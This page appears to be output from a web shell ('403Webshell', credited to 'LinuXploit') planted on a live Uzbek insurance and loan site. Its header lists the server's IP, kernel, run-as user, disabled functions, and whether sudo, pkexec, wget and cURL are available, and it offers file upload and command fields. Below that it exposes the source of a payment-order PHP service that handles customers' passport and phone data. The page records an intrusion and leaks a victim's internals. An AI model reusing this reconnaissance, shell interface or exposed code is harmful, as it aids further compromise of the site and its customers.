403Webshell
Server IP : 95.46.96.79  /  Your IP : 216.73.216.84
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux zaimer.uz 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : akslabs_uz_usr ( 1001)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/sugurtatrip__usr95/data/www/sugurtatrip.uz/apiv1/payments/click/services/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/sugurtatrip__usr95/data/www/sugurtatrip.uz/apiv1/payments/click/services/OrdersService.php
<?php

require_once __DIR__ . '/../database/Database.php';
require_once __DIR__ . '/../services/ClientsService.php';

class OrdersService {
  private $db;
  private $clientsService;

  public function __construct() {
    $database = new Database();
    $this->db = $database->getConnection();
    $this->clientsService = new ClientsService();
  }

  private function validateOrderData($data) {
    $missingFields = [];
    
    foreach ([
      'creditAmount',
      'creditPeriod', 
      'depositType', 
      // 'carNumber', 
      // 'region', 
      'firstName', 
      'secondName',
      'phone',
      // 'pinfl',
      // 'creditHistory',
      'passportNumber',
      'passportSeries',
      // 'clientAddress',
    ] 
    as $requiredField) {
      if (!isset($data[$requiredField])) {
        $missingFields[] = $requiredField;
      }
    }

    if (!empty($missingFields)) {
      http_response_code(500);
      return json_encode(['error' => "Missing required fields: " . implode(', ', $missingFields)]);
    }

    return true;
  }

  private function sanitizeOrderData($data) {
        $data['creditAmount'] = $this->sanitizeFloat($data['creditAmount']);
        $data['creditPeriod'] = $this->sanitizeInteger($data['creditPeriod']);
        $data['depositType'] = $this->sanitizeString($data['depositType']);
        // $data['carNumber'] = $this->sanitizeString($data['carNumber']);
        // $data['region'] = $this->sanitizeString($data['region']);
        $data['firstName'] = $this->sanitizeString($data['firstName']);
        $data['secondName'] = $this->sanitizeString($data['secondName']);
        $data['phone'] = $this->sanitizePhone($data['phone']);
        // $data['pinfl'] = $this->sanitizeInteger($data['pinfl']);
        // $data['creditHistory'] = $this->sanitizeString($data['creditHistory']);
        $data['passportNumber'] = $this->sanitizeInteger($data['passportNumber']);
        $data['passportSeries'] = $this->sanitizeString($data['passportSeries']);
        // $data['clientAddress'] = $this->sanitizeString($data['clientAddress']);
    
        return $data;
  }

  private function sanitizeFloat($value) {
    $numericValue = preg_replace('/[^0-9.]/', '', $value);
    $numericValue = preg_replace('/\.(?=.*\.)/', '', $numericValue);

    return (float)$numericValue;
  }

  private function sanitizeInteger($value) {
    $numericValue = preg_replace('/\D/', '', $value);
    
    return (int)$numericValue; (int)$value;
  }

  private function sanitizeCollateralType($value) {
    $validTypes = ['автомобиль', 'квартира', 'золото', 'default'];
    if (in_array($value, $validTypes)) {
      return $value;
    } else {
      return 'default';
    }
  }

  private function sanitizePhone($value) {
    if (substr($value, 0, 1) === '+') {
      $value = substr($value, 1);
    }

    $value = preg_replace('/\D/', '', $value);

    if (strlen($value) < 9) {
      $value = '';
    }

    return $value;
  }

  private function sanitizeString($value) {
    if ($value !== null) {
      $value = trim($value);
      $value = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    }
    return $value;
  }

  private function generateUniqueInteger($start, $end) {
    $timestamp = time();
    $random_value = mt_rand($start, $end);

    $unique_integer = $timestamp . $random_value;

    return $unique_integer;
  }

  public function createOrder($data) {

    $result = [];

    $validationResult = $this->validateOrderData($data);
    if($validationResult !== true) {
      return json_encode(['error' => $validationResult]);
    }

    $data = $this->sanitizeOrderData($data);

    $data['client_id'] = $this->clientsService->createClient($data);

    if ($data['client_id'] === null) {
      return json_encode(['error' => 'Failed to create client']);
    }

    $sql = "INSERT INTO orders (client_id, submission_datetime, loan_amount, loan_duration_months, collateral_type, phone_number, additional_feature_1, additional_feature_2)
            VALUES (:client_id, NOW(), :loan_amount, :loan_duration_months, :collateral_type, :phone_number, :additional_feature_1, :additional_feature_2)";

    $stmt = $this->db->prepare($sql);
    $stmt->bindValue(':client_id', $data['client_id']);
    $stmt->bindValue(':loan_amount', $data['creditAmount']);
    $stmt->bindValue(':loan_duration_months', $data['creditPeriod']);
    $stmt->bindValue(':collateral_type', $data['depositType']);
    // $stmt->bindValue(':car_registration_number', $data['carNumber']);
    // $stmt->bindValue(':region', $data['region']);
    $stmt->bindValue(':phone_number', $data['phone']);
    $stmt->bindValue(':additional_feature_1', $data['additionalFeature1'] ?? null);
    $stmt->bindValue(':additional_feature_2', $data['additionalFeature2'] ?? null);

    if ($stmt->execute()) {
      $order_id = $this->db->lastInsertId();
      $result['order_id'] = $order_id;
    } else {
      $errorInfo = $stmt->errorInfo();
      $errorMessage = $errorInfo[2];
      return json_encode(['error' => $errorMessage]);
    }

    $payment_sql = "INSERT INTO payment_requests (click_trans_id, order_id) VALUES (NULL, :order_id)";
      $payment_stmt = $this->db->prepare($payment_sql);
      $payment_stmt->bindParam(':order_id', $result['order_id']);

    if ($payment_stmt->execute()) {
      $payment_id = $this->db->lastInsertId();
      $result['payment_id'] = $payment_id;
    } else {
      $errorInfo = $stmt->errorInfo();
      $errorMessage = $errorInfo[2];
      return json_encode(['error' => $errorMessage]);
    }

    return json_encode($result);
  }
}

Youez - 2016 - github.com/yon3zu
LinuXploit